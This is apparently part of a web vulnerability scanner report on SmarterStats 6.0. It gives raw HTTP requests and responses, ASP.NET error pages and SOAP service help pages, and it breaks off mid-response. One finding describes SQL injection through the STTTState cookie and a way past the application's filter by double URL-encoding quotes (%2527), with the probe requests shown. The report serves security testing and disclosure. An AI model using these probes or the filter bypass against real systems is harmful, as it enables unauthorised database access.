.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=DeleteSiteByName HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}''; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:41 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 11500
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>DeleteSiteByName</h2>
<p class="intro">Deletes a site that exists in the MRS by using the site name.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/DeleteSiteByName' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteName:</td>
<td><input class="frmInput" type="text" size="50" name="SiteName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DeleteFiles:</td>
<td><input class="frmInput" type="text" size="50" name="DeleteFiles"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/DeleteSiteByName"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;DeleteSiteByName xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteName&gt;<font class=value>string</font>&lt;/SiteName&gt;
&lt;DeleteFiles&gt;<font class=value>boolean</font>&lt;/DeleteFiles&gt;
&lt;/DeleteSiteByName&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;DeleteSiteByNameResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;DeleteSiteByNameResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/DeleteSiteByNameResult&gt;
&lt;/DeleteSiteByNameResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;DeleteSiteByName xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteName&gt;<font class=value>string</font>&lt;/SiteName&gt;
&lt;DeleteFiles&gt;<font class=value>boolean</font>&lt;/DeleteFiles&gt;
&lt;/DeleteSiteByName&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;DeleteSiteByNameResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;DeleteSiteByNameResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/DeleteSiteByNameResult&gt;
&lt;/DeleteSiteByNameResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/DeleteSiteByName?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteName</font>=<font class=value>string</font>&amp;<font class=key>DeleteFiles</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/DeleteSiteByName HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteName</font>=<font class=value>string</font>&amp;<font class=key>DeleteFiles</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

2.12. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STTTState cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STTTState cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the STTTState cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Services/SiteAdmin.asmx?op=GetRequestedSettings HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=%2527; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:45 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetRequestedSettings HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=%2527%2527; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:45 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 7722
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetRequestedSettings</h2>
<p class="intro">Gets the requested settings for a site</p>

<h3>Test</h3>

The test form is only available for methods with primitive types as parameters.
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetRequestedSettings"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetRequestedSettings xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;keys&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;/keys&gt;
&lt;/GetRequestedSettings&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetRequestedSettingsResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetRequestedSettingsResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GetRequestedSettingsResult&gt;
&lt;values&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;/values&gt;
&lt;/GetRequestedSettingsResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
